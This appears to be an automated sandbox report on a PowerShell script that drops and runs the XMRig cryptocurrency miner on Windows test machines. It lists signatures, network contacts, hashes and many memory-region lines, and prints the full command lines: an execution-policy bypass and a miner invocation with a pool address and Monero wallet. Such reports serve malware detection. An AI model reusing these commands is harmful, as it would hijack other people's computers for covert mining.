SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1788-90-0x000001E60D410000-0x000001E60D430000-memory.dmp

memory/1788-91-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/4740-93-0x00007FFAB0573000-0x00007FFAB0574000-memory.dmp

memory/1788-92-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/4740-94-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/1788-95-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-96-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-97-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-98-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-99-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-100-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-101-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-102-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-103-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-104-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-105-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-106-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-107-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-108-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-109-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-110-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-111-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-112-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-113-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-114-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-115-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-116-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-117-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-118-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-119-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-120-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-121-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-122-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-123-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-124-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-125-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-126-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-127-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-128-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-129-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-130-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-131-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-132-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-133-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-134-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-135-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-136-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-137-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-138-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-139-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-140-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-141-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-142-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-143-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-144-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-145-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-146-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-147-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-148-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-149-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-150-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-151-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-152-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-153-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-154-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

memory/1788-155-0x00007FF714F70000-0x00007FF715BA3000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:38

Platform

win10v2004-20240508-en

Max time kernel

1789s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 52.111.229.43:443 tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 168.253.116.51.in-addr.arpa udp

Files

memory/4336-0-0x00007FFCBF2A3000-0x00007FFCBF2A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wnyzmc4h.zb5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4336-10-0x00000156A7D10000-0x00000156A7D32000-memory.dmp

memory/4336-11-0x00007FFCBF2A0000-0x00007FFCBFD61000-memory.dmp

memory/4336-12-0x00007FFCBF2A0000-0x00007FFCBFD61000-memory.dmp

memory/4336-14-0x00007FFCBF2A0000-0x00007FFCBFD61000-memory.dmp

memory/4336-16-0x000001568EE90000-0x000001568EE9A000-memory.dmp

memory/4336-15-0x00000156A7D40000-0x00000156A7D52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4752-47-0x000001C184170000-0x000001C184190000-memory.dmp

memory/4752-48-0x000001C185970000-0x000001C185990000-memory.dmp

memory/4752-49-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-50-0x000001C185990000-0x000001C1859B0000-memory.dmp

memory/4752-51-0x000001C1859B0000-0x000001C1859D0000-memory.dmp

memory/4752-52-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4336-53-0x00007FFCBF2A3000-0x00007FFCBF2A5000-memory.dmp

memory/4336-54-0x00007FFCBF2A0000-0x00007FFCBFD61000-memory.dmp

memory/4752-55-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4336-56-0x00007FFCBF2A0000-0x00007FFCBFD61000-memory.dmp

memory/4752-57-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-59-0x000001C1859B0000-0x000001C1859D0000-memory.dmp

memory/4752-58-0x000001C185990000-0x000001C1859B0000-memory.dmp

memory/4752-60-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-61-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-62-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-63-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-64-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-65-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-66-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-67-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-68-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-69-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-70-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-71-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-72-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-73-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-74-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-75-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-76-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-77-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-78-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-79-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-80-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-81-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-82-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-83-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-84-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-85-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-86-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-87-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-88-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-89-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-90-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-91-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-92-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-93-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-94-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-95-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-96-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-97-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-98-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-99-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-100-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-101-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-102-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-103-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-104-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-105-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-106-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-107-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-108-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-109-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-110-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-111-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-112-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-113-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-114-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-115-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-116-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-117-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-118-0x00007FF724850000-0x00007FF725483000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:39

Platform

win11-20240426-en

Max time kernel

1789s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/1096-0-0x00007FFF3C5D3000-0x00007FFF3C5D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t0xtc2pi.5dj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1096-6-0x00007FFF3C5D0000-0x00007FFF3D092000-memory.dmp

memory/1096-10-0x000001C752230000-0x000001C752252000-memory.dmp

memory/1096-11-0x00007FFF3C5D0000-0x00007FFF3D092000-memory.dmp

memory/1096-12-0x00007FFF3C5D0000-0x00007FFF3D092000-memory.dmp

memory/1096-14-0x000001C76ABB0000-0x000001C76ABC2000-memory.dmp

memory/1096-15-0x000001C7522F0000-0x000001C7522FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4064-46-0x00000151C94C0000-0x00000151C94E0000-memory.dmp

memory/4064-47-0x00000151C9870000-0x00000151C9890000-memory.dmp

memory/4064-48-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/1096-49-0x00007FFF3C5D0000-0x00007FFF3D092000-memory.dmp

memory/4064-52-0x00000151CAFC0000-0x00000151CAFE0000-memory.dmp

memory/4064-53-0x00000151CAFE0000-0x00000151CB000000-memory.dmp

memory/4064-50-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/1096-51-0x00007FFF3C5D3000-0x00007FFF3C5D5000-memory.dmp

memory/4064-54-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-55-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-57-0x00000151CAFE0000-0x00000151CB000000-memory.dmp

memory/4064-56-0x00000151CAFC0000-0x00000151CAFE0000-memory.dmp

memory/4064-58-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-59-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-60-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-61-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-62-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-63-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-64-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-65-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-66-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-67-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-68-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-69-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-70-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-71-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-72-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-73-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-74-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-75-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-76-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-77-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-78-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-79-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-80-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-81-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-82-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-83-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-84-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-85-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-86-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-87-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-88-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-89-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-90-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-91-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-92-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-93-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-94-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-95-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-96-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-97-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-98-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-99-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-100-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-101-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-102-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-103-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-104-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-105-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-106-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-107-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-108-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-109-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-110-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-111-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-112-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-113-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-114-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-115-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-116-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:58

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1755s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
